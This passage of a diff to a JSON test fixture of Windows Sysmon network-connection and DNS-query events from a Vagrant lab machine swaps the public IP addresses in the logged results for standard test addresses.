Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "3", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3834,7 +3834,7 @@ }, "event_data": { "DestinationIsIpv6": "false", - "DestinationIp": "169.254.255.255", + "DestinationIp": "89.160.20.156", "ProcessGuid": "{42f11c3b-6e19-5c8c-0000-0010eb030000}", "User": "NT AUTHORITY\\SYSTEM", "Initiated": "true", @@ -3869,7 +3869,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029861900Z'/\u003e\u003cEventRecordID\u003e128\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.890\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eapi-s2s.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -3892,7 +3892,7 @@ "ProcessId": "2736", "QueryName": "api-s2s.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:151.101.66.2;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;" + "QueryResults": "type: 5 f2.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "process": { "pid": 2828, @@ -3915,7 +3915,7 @@ "ProcessId": "2736", "QueryName": "x.bidswitch.net", "QueryStatus": "0", - "QueryResults": "::ffff:35.231.30.22;::ffff:35.196.212.198;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -3944,13 +3944,13 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.231.30.22;::ffff:35.196.212.198;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029870000Z'/\u003e\u003cEventRecordID\u003e129\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.892\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ex.bidswitch.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { "@timestamp": "2021-05-05T15:30:51.701Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -3976,7 +3976,7 @@ "event_data": { "QueryName": "pixel.adsafeprotected.com", "QueryStatus": "0", - "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:199.166.0.26;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.894", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -3995,7 +3995,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -4007,7 +4007,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.894", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -4037,7 +4037,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -4051,7 +4051,7 @@ "ProcessId": "2736", "QueryName": "aa.agkn.com", "QueryStatus": "0", - "QueryResults": "::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.902", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4080,7 +4080,7 @@ "ProcessId": "2736", "QueryName": "s0.2mdn.net", "QueryStatus": "0", - "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:03.911", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -4110,7 +4110,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 